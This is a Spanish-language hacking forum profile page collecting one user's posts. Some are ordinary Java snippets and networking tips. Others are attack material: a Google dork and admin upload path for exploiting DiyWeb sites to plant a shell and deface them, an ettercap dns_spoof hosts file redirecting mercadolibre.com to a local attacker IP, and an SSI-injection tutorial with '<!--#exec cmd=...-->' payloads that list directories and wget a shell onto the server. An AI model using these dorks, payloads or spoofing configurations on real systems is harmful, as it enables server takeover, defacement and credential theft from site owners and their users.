Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - xc0d3

#1
Código: java
package Control;

import java.util.regex.*;

public class Validaciones {

public static String mensaje;

public static boolean rut(String rut)
{
boolean tiro = false;
Pattern rut1 = Pattern.compile("^\\d{1,2}+.\\d{3}+.\\d{3}[-][0-9kK]{1}$");
if(!rut1.matcher(rut).find())
mensaje = "El RUT debe tener el siguiente formato: xx.xxx.xxx-x";
else
{
String dv = rut.substring(rut.length()-1, rut.length()).toUpperCase();
rut = rut.substring(0,rut.length()-2);
String rut_limpio = rut.replace(".", "");

int rut_ver = Integer.parseInt(rut_limpio);

int Digito;
     int Contador;
     int Multiplo;
     int Acumulador;
     String rutDigito;

     Contador = 2;
     Acumulador = 0;

     while (rut_ver != 0)
     {
      Multiplo = (rut_ver % 10) * Contador;
      Acumulador = Acumulador + Multiplo;
      rut_ver = rut_ver/10;
      Contador = Contador + 1;
      if (Contador == 8)
      {
          Contador = 2;
      }
      }

      Digito = 11 - (Acumulador % 11);
      rutDigito = Integer.toString(Digito);
     
      if (Digito == 10 )
      {
         rutDigito = "K";
      }
      else if (Digito == 11)
      {
            rutDigito = "0";
      }
      if(rutDigito.equals(dv))
          tiro = true;
      else
      mensaje = "Digito Verificador incorrecto.";
}

return tiro;
}

public static boolean soloLetras(String cadena)
{
if(Pattern.matches("[A-Za-z]+", cadena))
return true;
else
{
mensaje = "Sólo se aceptan letras para el campo ";
return false;
}
}
}


jojojo saludos hermano xD
#2
Dudas y pedidos generales / Re:Problemas con mi router
Febrero 13, 2013, 09:25:34 PM
compra un acces point y colocalo en modo repetidor , pone tu router en el canal 11 saludos
#4
"Piensa en java" de bruce heckel ademas debes aprender a usar los ciclos sabercomo funcionan etcc. si estas espesando  comienza con pseint
#5
Códigos Fuentes / Re:[VB6] BlackShades 2.6.3 [SRC]
Noviembre 20, 2012, 11:06:14 PM
funciona con winsuck ? o con csocket ?
#6
Presentaciones y cumpleaños / Re:Adwind
Octubre 26, 2012, 03:20:43 PM
Bienvenido y muxas gracias :D
#7
Código: JAVA
public class Palindromo {

public static void main(String args[])
{
  ConsoleReader entrada = new ConsoleReader(System.in);
  String s="";
  System.out.print("Ingrese la palabra : ");
  s = entrada.readLine ();
 
  int i;
  int n=s.length();
  String str="";
  for(i=n-1;i>=0;i--)
  str=str+s.charAt(i);
  if(str.equals(s))
  System.out.println(s+ " es palindrome ");
  else
  System.out.println(s+ " no es  palindrome");
}

}

#8
Dudas y pedidos generales / Re:backtrack en tablet
Octubre 09, 2012, 02:05:51 PM
1 gb ramddr3 1.5 dual core 16 gb hdd
#9
e pensado en comprarme este tablet Ramos W17 mi duda es si soportara backtrack la arm :S
#10
Pentesting / Re:CMSPwner v1 [Wordpress Version][Source]
Septiembre 06, 2012, 03:05:09 PM
(Y)
#11
depende del servidor del dhcp que es el q se encarga de asignar ip si cada equipo tiene su ip estatica tendras que agregarte una ip estatica tu sino puede ser q se comunique por un puerto especifico
#12
Bugs y Exploits / DiyWeb exploit
Agosto 28, 2012, 01:07:55 AM
Dork
"Power by DiyWeb"
inurl:/template.asp?menuid=
exploit  : diyweb/menu/admin/image_manager.asp
ejemplo


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

y con un poco de ingenio bypass

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




y acá subiríamos nuestra shell

como somos chicos buenos le dejaremos un mensaje al admin

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


saludos
#13
Dudas y pedidos generales / [SOLUCIONADO] Zone-h
Agosto 06, 2012, 12:39:22 AM
asdawadasdadad
#14
ejecuta msfconsole en otra terminal actualizalo y luego lánzalo denuedo el Set
apt-get update
#15
Dudas y pedidos generales / Re:Dns SPoof ayuda
Julio 20, 2012, 12:47:39 PM
Solucionado .
#16

Código: php
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
#                                                                          #
# Sample hosts file for dns_spoof plugin                                   #
#                                                                          #
# the format is (for A query):                                             #
#   www.myhostname.com A 168.11.22.33                                      #
#   *.foo.com          A 168.44.55.66                                      #
#                                                                          #
# or for PTR query:                                                        #
#   www.bar.com A 10.0.0.10                                                #
#                                                                          #
# or for MX query:                                                         #
#    domain.com MX xxx.xxx.xxx.xxx                                         #
#                                                                          #
# or for WINS query:                                                       #
#    workgroup WINS 127.0.0.1                                              #
#    PC*       WINS 127.0.0.1                                              #
#                                                                          #
# NOTE: the wildcarded hosts can't be used to poison the PTR requests      #
#       so if you want to reverse poison you have to specify a plain       #
#       host. (look at the www.microsoft.com example)                      #
#                                                                          #
############################################################################

################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
mercadolibre.com      A   192.168.1.65:80
*.mercadolibre.com    A   192.168.1.65:80
www.mercadolibre.com  PTR 192.168.1.65:80      # Wildcards in PTR are not allowed

#microsoft.com      A   192.168.1.65
#*.microsoft.com    A   192.168.1.65
#www.microsoft.com  PTR 192.168.1.65      # Wildcards in PTR are not allowed
#
##########################################
# no one out there can have our domains...
#

www.alor.org  A 127.0.0.1
www.naga.org  A 127.0.0.1

###############################################
# one day we will have our ettercap.org domain
#

www.ettercap.org           A  127.0.0.1
ettercap.sourceforge.net   A  216.136.171.201

###############################################
# some MX examples
#

alor.org   MX  127.0.0.1
naga.org   MX  127.0.0.1

###############################################
# This messes up NetBIOS clients using DNS
# resolutions. I.e. Windows/Samba file sharing.
#

LAB-PC*  WINS  127.0.0.1

# vim:ts=8:noexpandtab


mm no me redirecciona  y en etter me aparece esto cuando pongo la pagina de mocosoft
dns_spoof: [microsoft.com] spoofed to [198.182.196.56]
dns_spoof: [microsoft.com] spoofed to [198.182.196.56]

#18

(Server Side Include) es una técnica de explotación de servidor que permite a un atacante enviar código a una aplicación web, que posteriormente será ejecutado localmente por el servidor web. el ataque permite la explotación de una aplicación web mediante la inyección de secuencias de comandos en páginas HTML o ejecutar códigos arbitrarios de forma remota .

Para este ejemplo he utilizado el comando <! - # echo var = "DATE_LOCAL" -> . Aquí hay un formulario de acceso en blanco Ahora, después de que me inyecto <! - # echo var = "DATE_LOCAL" -> en el nombre de usuario y contraseña de campo, esta salida es lo que asegura la página es vulnerable a la SSI, conforme se ejecuta el comando que he presentado en la presentación del formulario. Aquí está la salida. Ahora, yo no voy a aprovechar este servidor (no creo en la piratería sin razón), pero ahora sabiendo que el servidor es vulnerable a la SSI, que puede ejecutar un comando para subir una Shell y luego tomar el control del servidor. Comando: <! - # exec cmd = "wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta "->



<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

este comando nos permite ver los directorios




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

con este comando nos permitirá enviar nuestra shell o exploit deface etc.

<!--#exec cmd="wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" -->

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta WEB PARA QUE PRACTIQUEN =D

#19
Diseño UX/UI / Re:Pedi tu firma Underc0de!
Junio 21, 2012, 11:39:35 AM
=D Yo igual quiero xD
#20
Gracias man
--------- mas vale pasar de tonto un minuto que toda la vida----------